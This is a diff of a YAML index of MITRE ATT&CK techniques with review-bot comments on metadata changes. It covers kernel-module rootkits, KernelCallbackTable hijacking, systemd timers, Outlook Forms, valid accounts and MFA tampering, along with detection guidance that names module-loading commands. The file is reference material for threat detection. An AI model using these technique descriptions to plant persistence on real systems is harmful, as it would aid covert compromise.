+ When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0).(Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors, and enabling root access to non-privileged users.(Citation: iDefense Rootkit Overview)
+
+ Kernel extensions, also called kext, are used in macOS to load functionality onto a system similar to LKMs for Linux. Since the kernel is responsible for enforcing security and the kernel extensions run as apart of the kernel, kexts are not governed by macOS security policies. Kexts are loaded and unloaded through kextload
and kextunload
commands. Kexts need to be signed with a developer ID that is granted privileges by Apple allowing it to sign Kernel extensions. Developers without these privileges may still sign kexts but they will not load unless SIP is disabled. If SIP is enabled, the kext signature is verified before being added to the AuxKC.(Citation: System and kernel extensions in macOS)
+
+ Since macOS Catalina 10.15, kernel extensions have been deprecated in favor of System Extensions. However, kexts are still allowed as "Legacy System Extensions" since there is no System Extension for Kernel Programming Interfaces.(Citation: Apple Kernel Extension Deprecation)
+
+ Adversaries can use LKMs and kexts to conduct [Persistence](https://attack.mitre.org/tactics/TA0003) and/or [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) on a system. Examples have been found in the wild, and there are some relevant open source projects as well.(Citation: Volatility Phalanx2)(Citation: CrowdStrike Linux Rootkit)(Citation: GitHub Reptile)(Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle)(Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)(Citation: Trend Micro Skidmap)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
x_mitre_contributors:
- Wayne Silva, F-Secure Countercept
- Anastasios Pingios
- Jeremy Galloway
- Red Canary
- Eric Kaiser @ideologysec
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_deprecated: false
+ x_mitre_detection: |
+ Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands: modprobe
, insmod
, lsmod
, rmmod
, or modinfo
(Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into /lib/modules
and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)
+
+ Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: apt-get install linux-headers-$(uname -r)
On RHEL and CentOS based systems this can be accomplished by running: yum install kernel-devel-$(uname -r)
+
+ On macOS, monitor for execution of kextload
commands and user installed kernel extensions performing abnormal and/or potentially malicious activity (such as creating network connections). Monitor for new rows added in the kext_policy
table. KextPolicy stores a list of user approved (non Apple) kernel extensions and a partial history of loaded kernel modules in a SQLite database, /var/db/SystemPolicyConfiguration/KextPolicy
.(Citation: User Approved Kernel Extension Pike’s)(Citation: Purves Kextpocalypse 2)(Citation: Apple Developer Configuration Profile)
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - macOS
+ - Linux
+ x_mitre_version: '1.3'
+ x_mitre_data_sources:
+ - 'Command: Command Execution'
+ - 'File: File Creation'
+ - 'File: File Modification'
+ - 'Kernel: Kernel Module Load'
+ - 'Process: Process Creation'
+ x_mitre_permissions_required:
+ - root
type: attack-pattern
id: attack-pattern--a1b52199-c8c5-438a-9ded-656f1d0888c6
created: '2020-01-24T17:42:23.339Z'
- x_mitre_version: '1.3'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1547.006
url: https://attack.mitre.org/techniques/T1547/006
+ external_id: T1547.006
- source_name: Apple Developer Configuration Profile
- url: https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf
description: Apple. (2019, May 3). Configuration Profile Reference. Retrieved
September 23, 2021.
+ url: https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf
- source_name: Apple Kernel Extension Deprecation
- url: https://developer.apple.com/support/kernel-extensions/
description: Apple. (n.d.). Deprecated Kernel Extensions and System Extension
Alternatives. Retrieved November 4, 2020.
+ url: https://developer.apple.com/support/kernel-extensions/
- source_name: System and kernel extensions in macOS
- url: https://support.apple.com/guide/deployment/system-and-kernel-extensions-in-macos-depa5fb8376f/web
description: Apple. (n.d.). System and kernel extensions in macOS. Retrieved
March 31, 2022.
+ url: https://support.apple.com/guide/deployment/system-and-kernel-extensions-in-macos-depa5fb8376f/web
- source_name: GitHub Reptile
- url: https://github.com/f0rb1dd3n/Reptile
description: Augusto, I. (2018, March 8). Reptile - LMK Linux rootkit. Retrieved
April 9, 2018.
+ url: https://github.com/f0rb1dd3n/Reptile
- source_name: Volatility Phalanx2
- url: https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html
description: 'Case, A. (2012, October 10). Phalanx 2 Revealed: Using Volatility
to Analyze an Advanced Linux Rootkit. Retrieved April 9, 2018.'
+ url: https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html
- source_name: iDefense Rootkit Overview
- url: http://www.megasecurity.org/papers/Rootkits.pdf
description: Chuvakin, A. (2003, February). An Overview of Rootkits. Retrieved
- April 6, 2018.
+ September 12, 2024.
+ url: https://www.megasecurity.org/papers/Rootkits.pdf
- source_name: Linux Loadable Kernel Module Insert and Remove LKMs
- url: http://tldp.org/HOWTO/Module-HOWTO/x197.html
description: Henderson, B. (2006, September 24). How To Insert And Remove
LKMs. Retrieved April 9, 2018.
+ url: http://tldp.org/HOWTO/Module-HOWTO/x197.html
- source_name: CrowdStrike Linux Rootkit
- url: https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/
description: Kurtz, G. (2012, November 19). HTTP iframe Injecting Linux Rootkit.
Retrieved December 21, 2017.
+ url: https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/
- source_name: GitHub Diamorphine
- url: https://github.com/m0nad/Diamorphine
description: Mello, V. (2018, March 8). Diamorphine - LMK rootkit for Linux
Kernels 2.6.x/3.x/4.x (x86 and x86_64). Retrieved April 9, 2018.
+ url: https://github.com/m0nad/Diamorphine
- source_name: Securelist Ventir
- url: https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/
description: 'Mikhail, K. (2014, October 16). The Ventir Trojan: assemble
your MacOS spy. Retrieved April 6, 2018.'
+ url: https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/
- source_name: User Approved Kernel Extension Pike’s
- url: https://pikeralpha.wordpress.com/2017/08/29/user-approved-kernel-extension-loading/
description: Pikeralpha. (2017, August 29). User Approved Kernel Extension
Loading…. Retrieved September 23, 2021.
+ url: https://pikeralpha.wordpress.com/2017/08/29/user-approved-kernel-extension-loading/
- source_name: Linux Kernel Module Programming Guide
- url: http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html
description: Pomerantz, O., Salzman, P. (2003, April 4). Modules vs Programs.
Retrieved April 6, 2018.
+ url: http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html
- source_name: Linux Kernel Programming
- url: https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf
description: Pomerantz, O., Salzman, P.. (2003, April 4). The Linux Kernel
Module Programming Guide. Retrieved April 6, 2018.
+ url: https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf
- source_name: Trend Micro Skidmap
- url: https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/
description: Remillano, A., Urbanec, J. (2019, September 19). Skidmap Linux
Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload.
Retrieved June 4, 2020.
+ url: https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/
- source_name: Purves Kextpocalypse 2
- url: https://richard-purves.com/2017/11/09/mdm-and-the-kextpocalypse-2/
description: Richard Purves. (2017, November 9). MDM and the Kextpocalypse
. Retrieved September 23, 2021.
+ url: https://richard-purves.com/2017/11/09/mdm-and-the-kextpocalypse-2/
- source_name: RSAC 2015 San Francisco Patrick Wardle
- url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
description: Wardle, P. (2015, April). Malware Persistence on OS X Yosemite.
Retrieved April 6, 2018.
+ url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
- source_name: Synack Secure Kernel Extension Broken
- url: https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/
description: Wardle, P. (2017, September 8). High Sierra’s ‘Secure Kernel
Extension Loading’ is Broken. Retrieved April 6, 2018.
+ url: https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/
- source_name: Wikipedia Loadable Kernel Module
- url: https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux
description: Wikipedia. (2018, March 17). Loadable kernel module. Retrieved
April 9, 2018.
- x_mitre_deprecated: false
- revoked: false
- description: |-
- Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.(Citation: Linux Kernel Programming)
-
- When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0).(Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors, and enabling root access to non-privileged users.(Citation: iDefense Rootkit Overview)
-
- Kernel extensions, also called kext, are used in macOS to load functionality onto a system similar to LKMs for Linux. Since the kernel is responsible for enforcing security and the kernel extensions run as apart of the kernel, kexts are not governed by macOS security policies. Kexts are loaded and unloaded through kextload
and kextunload
commands. Kexts need to be signed with a developer ID that is granted privileges by Apple allowing it to sign Kernel extensions. Developers without these privileges may still sign kexts but they will not load unless SIP is disabled. If SIP is enabled, the kext signature is verified before being added to the AuxKC.(Citation: System and kernel extensions in macOS)
-
- Since macOS Catalina 10.15, kernel extensions have been deprecated in favor of System Extensions. However, kexts are still allowed as "Legacy System Extensions" since there is no System Extension for Kernel Programming Interfaces.(Citation: Apple Kernel Extension Deprecation)
-
- Adversaries can use LKMs and kexts to conduct [Persistence](https://attack.mitre.org/tactics/TA0003) and/or [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) on a system. Examples have been found in the wild, and there are some relevant open source projects as well.(Citation: Volatility Phalanx2)(Citation: CrowdStrike Linux Rootkit)(Citation: GitHub Reptile)(Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle)(Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)(Citation: Trend Micro Skidmap)
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: 'Boot or Logon Autostart Execution: Kernel Modules and Extensions'
- x_mitre_detection: |
- Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands: modprobe
, insmod
, lsmod
, rmmod
, or modinfo
(Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into /lib/modules
and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)
-
- Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: apt-get install linux-headers-$(uname -r)
On RHEL and CentOS based systems this can be accomplished by running: yum install kernel-devel-$(uname -r)
-
- On macOS, monitor for execution of kextload
commands and user installed kernel extensions performing abnormal and/or potentially malicious activity (such as creating network connections). Monitor for new rows added in the kext_policy
table. KextPolicy stores a list of user approved (non Apple) kernel extensions and a partial history of loaded kernel modules in a SQLite database, /var/db/SystemPolicyConfiguration/KextPolicy
.(Citation: User Approved Kernel Extension Pike’s)(Citation: Purves Kextpocalypse 2)(Citation: Apple Developer Configuration Profile)
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: persistence
- - kill_chain_name: mitre-attack
- phase_name: privilege-escalation
- x_mitre_is_subtechnique: true
- x_mitre_data_sources:
- - 'Command: Command Execution'
- - 'File: File Creation'
- - 'File: File Modification'
- - 'Kernel: Kernel Module Load'
- - 'Process: Process Creation'
- x_mitre_permissions_required:
- - root
- x_mitre_attack_spec_version: 2.1.0
+ url: https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.006
atomic_tests:
- name: Linux - Load Kernel Module via insmod
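Review bot: the trailing deletions in this hunk (the T1547.006 `description`, `x_mitre_detection`, `kill_chain_phases`, `x_mitre_data_sources`, `x_mitre_permissions_required`, `name` and `modified` lines) have no `+` counterpart in the visible lines, so confirm they are re-emitted earlier in the hunk the way the other reordered technique objects in this patch are; otherwise the Kernel Modules and Extensions entry loses its detection guidance and its persistence and privilege-escalation phases. The `x_mitre_attack_spec_version: 2.1.0` to `3.2.0` bump, the added `object_marking_refs`, and the dropped `spec_version: '2.1'` match the rest of the patch. One thing visible in the deleted text that is worth checking in the regenerated copy: inline code tokens such as `kextload`, `kextunload`, `modprobe` and `insmod` were split onto their own lines, which suggests backtick markup was stripped when the YAML was produced.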
@@ -39391,7 +39814,7 @@ persistence:
url: https://docs.microsoft.com/en-us/windows/win32/api/winternl/nf-winternl-ntqueryinformationprocess
description: Microsoft. (2021, November 23). NtQueryInformationProcess function
(winternl.h). Retrieved February 4, 2022.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-22T15:47:33.915Z'
name: KernelCallbackTable
description: |-
Adversaries may abuse the KernelCallbackTable
of a process to hijack its execution flow in order to run their own payloads.(Citation: Lazarus APT January 2022)(Citation: FinFisher exposed ) The KernelCallbackTable
can be found in the Process Environment Block (PEB) and is initialized to an array of graphic functions available to a GUI process once user32.dll
is loaded.(Citation: Windows Process Injection KernelCallbackTable)
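Review bot: the `modified` timestamp for KernelCallbackTable moves backwards, from '2022-05-11T14:00:00.188Z' to '2022-03-22T15:47:33.915Z'. A regenerated index should not carry an older modification time than the one it replaces unless the upstream STIX object's value was corrected, so confirm the source value rather than accepting the regression silently. The same backwards move appears for ROMMONkit, IIS Components, Authentication Package and Component Object Model Hijacking in later hunks of this patch.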
@@ -39417,12 +39840,10 @@ persistence:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Process: OS API Execution'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1053.006:
technique:
- modified: '2023-09-08T11:56:26.862Z'
+ modified: '2024-10-15T16:42:51.536Z'
name: 'Scheduled Task/Job: Systemd Timers'
description: |-
Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension .timer
that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments.(Citation: archlinux Systemd Timers Aug 2020) Systemd timers may be activated remotely via the systemctl
command line utility, which operates over [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: Systemd Remote Control)
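Review bot: `x_mitre_attack_spec_version: 2.1.0` is deleted for KernelCallbackTable with no replacement in this hunk, whereas the other techniques in the patch are moved to `x_mitre_attack_spec_version: 3.2.0`. Dropping `spec_version: '2.1'` is consistent with the rest of the patch, but an entry without any attack-spec version leaves consumers no way to tell which schema it follows; either add `x_mitre_attack_spec_version: 3.2.0` here or confirm it is emitted elsewhere in the object. The same unreplaced removal happens for ROMMONkit in the `@@ -39662` hunk and for IIS Components in the `@@ -40132` hunk.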
@@ -39500,9 +39921,8 @@ persistence:
url: http://man7.org/linux/man-pages/man1/systemd.1.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.006
atomic_tests:
- name: Create Systemd Service and Timer
@@ -39640,7 +40060,7 @@ persistence:
url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
description: Omar Santos. (2020, October 19). Attackers Continue to Target
Legacy Devices. Retrieved October 20, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-22T02:18:19.568Z'
name: ROMMONkit
description: |-
Adversaries may abuse the ROM Monitor (ROMMON) by loading an unauthorized firmware with adversary code to provide persistent access and manipulate device behavior that is difficult to detect. (Citation: Cisco Synful Knock Evolution)(Citation: Cisco Blog Legacy Device Attacks)
@@ -39662,41 +40082,10 @@ persistence:
- 'Firmware: Firmware Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1137.003:
technique:
- x_mitre_platforms:
- - Windows
- - Office 365
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--a9e2cea0-c805-4bf8-9e31-f5f0513a3634
- type: attack-pattern
- created: '2019-11-07T20:06:02.624Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1137.003
- url: https://attack.mitre.org/techniques/T1137/003
- - source_name: SensePost Outlook Forms
- url: https://sensepost.com/blog/2017/outlook-forms-and-shells/
- description: Stalmans, E. (2017, April 28). Outlook Forms and Shells. Retrieved
- February 4, 2019.
- - source_name: Microsoft Detect Outlook Forms
- url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
- description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
- Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
- 4, 2019.
- - source_name: SensePost NotRuler
- url: https://github.com/sensepost/notruler
- description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
- provides blue teams with the ability to detect Ruler usage against Exchange.
- Retrieved February 4, 2019.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T16:02:00.782Z'
name: Outlook Forms
description: |-
Adversaries may abuse Microsoft Outlook forms to obtain persistence on a compromised system. Outlook forms are used as templates for presentation and functionality in Outlook messages. Custom Outlook forms can be created that will execute code when a specifically crafted email is sent by an adversary utilizing the same custom Outlook form.(Citation: SensePost Outlook Forms)
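Review bot: the T1137.003 Outlook Forms block deleted here (`x_mitre_platforms`, `x_mitre_domains`, `object_marking_refs`, `id`, `type`, `created`, `created_by_ref`, `external_references`) is re-added in reordered form in the following hunk, so that part is a reorder rather than a loss. Note, though, that `Office 365` in `x_mitre_platforms` comes back as `Office Suite`, which is a semantic platform change and should be stated in the commit message rather than left to be inferred from a field reorder.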
@@ -39705,22 +40094,49 @@ persistence:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: |-
Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - Office Suite
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Command: Command Execution'
- 'Process: Process Creation'
- x_mitre_permissions_required:
- - Administrator
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--a9e2cea0-c805-4bf8-9e31-f5f0513a3634
+ created: '2019-11-07T20:06:02.624Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1137/003
+ external_id: T1137.003
+ - source_name: Microsoft Detect Outlook Forms
+ description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
+ Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
+ 4, 2019.
+ url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
+ - source_name: SensePost NotRuler
+ description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
+ provides blue teams with the ability to detect Ruler usage against Exchange.
+ Retrieved February 4, 2019.
+ url: https://github.com/sensepost/notruler
+ - source_name: SensePost Outlook Forms
+ description: Stalmans, E. (2017, April 28). Outlook Forms and Shells. Retrieved
+ February 4, 2019.
+ url: https://sensepost.com/blog/2017/outlook-forms-and-shells/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1574:
technique:
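Review bot: `x_mitre_permissions_required` (Administrator, User) is removed from T1137.003 with no `+` replacement, so the Outlook Forms entry silently loses its permissions data; confirm the upstream object no longer carries the key and that nothing generating the indexes reads it. The `x_mitre_version` bump from '1.1' to '1.2' together with `Office 365` to `Office Suite` is consistent with the same rename applied to T1078, T1556.006 and T1546 elsewhere in this patch. The four external references (mitre-attack, Microsoft Detect Outlook Forms, SensePost NotRuler, SensePost Outlook Forms) are the same entries as before, reordered with `url` now after `description`, so no citation is lost.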
@@ -39786,7 +40202,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1543.005:
technique:
@@ -39860,11 +40275,10 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:09:46.024Z'
name: Valid Accounts
description: |-
Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
@@ -39881,7 +40295,6 @@ persistence:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
- x_mitre_attack_spec_version: 3.1.0
x_mitre_contributors:
- Syed Ummar Farooqh, McAfee
- Prasad Somasamudram, McAfee
@@ -39891,7 +40304,7 @@ persistence:
- Netskope
- Mark Wee
- Praetorian
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: |-
Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
@@ -39900,19 +40313,17 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '2.6'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.7'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'User Account: User Account Authentication'
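Review bot: this hunk drops `Azure AD`, `Office 365` and `Google Workspace` from T1078's `x_mitre_platforms` and adds `Office Suite` and `Identity Provider`. Any per-platform index or filter keyed on the old names will stop matching Valid Accounts after this change, so the platform index generation should be re-run and its output reviewed in the same change. The `x_mitre_version` bump from '2.6' to '2.7' is the right accompaniment; the removed `x_mitre_modified_by_ref` is re-added in the `@@ -39960` hunk, so that is a reorder.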
@@ -39960,11 +40371,12 @@ persistence:
url: https://technet.microsoft.com/en-us/library/dn487457.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1556.006:
technique:
- modified: '2024-04-16T00:20:21.488Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Multi-Factor Authentication
description: "Adversaries may disable or modify multi-factor authentication
(MFA) mechanisms to enable persistent access to compromised accounts.\n\nOnce
@@ -39993,24 +40405,26 @@ persistence:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Liran Ravich, CardinalOps
- Muhammad Moiz Arshad, @5T34L7H
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- Linux
- macOS
- x_mitre_version: '1.2'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Application Log: Application Log Content'
@@ -40045,9 +40459,6 @@ persistence:
url: https://docs.microsoft.com/en-us/azure/active-directory/governance/conditional-access-exclusion
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1505.004:
technique:
@@ -40107,7 +40518,7 @@ persistence:
description: Falcone, R. (2018, January 25). OilRig uses RGDoor IIS Backdoor
on Targets in the Middle East. Retrieved July 6, 2018.
source_name: Unit 42 RGDoor Jan 2018
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-17T15:06:24.161Z'
name: IIS Components
description: |-
Adversaries may install malicious components that run on Internet Information Services (IIS) web servers to establish persistence. IIS provides several mechanisms to extend the functionality of the web servers. For example, Internet Server Application Programming Interface (ISAPI) extensions and filters can be installed to examine and/or modify incoming and outgoing IIS web requests. Extensions and filters are deployed as DLL files that export three functions: Get{Extension/Filter}Version
, Http{Extension/Filter}Proc
, and (optionally) Terminate{Extension/Filter}
. IIS modules may also be installed to extend IIS web servers.(Citation: Microsoft ISAPI Extension Overview 2017)(Citation: Microsoft ISAPI Filter Overview 2017)(Citation: IIS Backdoor 2011)(Citation: Trustwave IIS Module 2013)
@@ -40132,13 +40543,11 @@ persistence:
x_mitre_permissions_required:
- Administrator
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1505.004
atomic_tests: []
T1546:
technique:
- modified: '2024-03-01T15:49:15.588Z'
+ modified: '2024-10-15T15:57:00.731Z'
name: Event Triggered Execution
description: "Adversaries may establish persistence and/or elevate privileges
using system mechanisms that trigger execution based on specific events. Various
@@ -40191,8 +40600,8 @@ persistence:
- Windows
- SaaS
- IaaS
- - Office 365
- x_mitre_version: '1.3'
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Module: Module Load'
- 'WMI: WMI Creation'
@@ -40240,78 +40649,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546
atomic_tests: []
T1546.004:
technique:
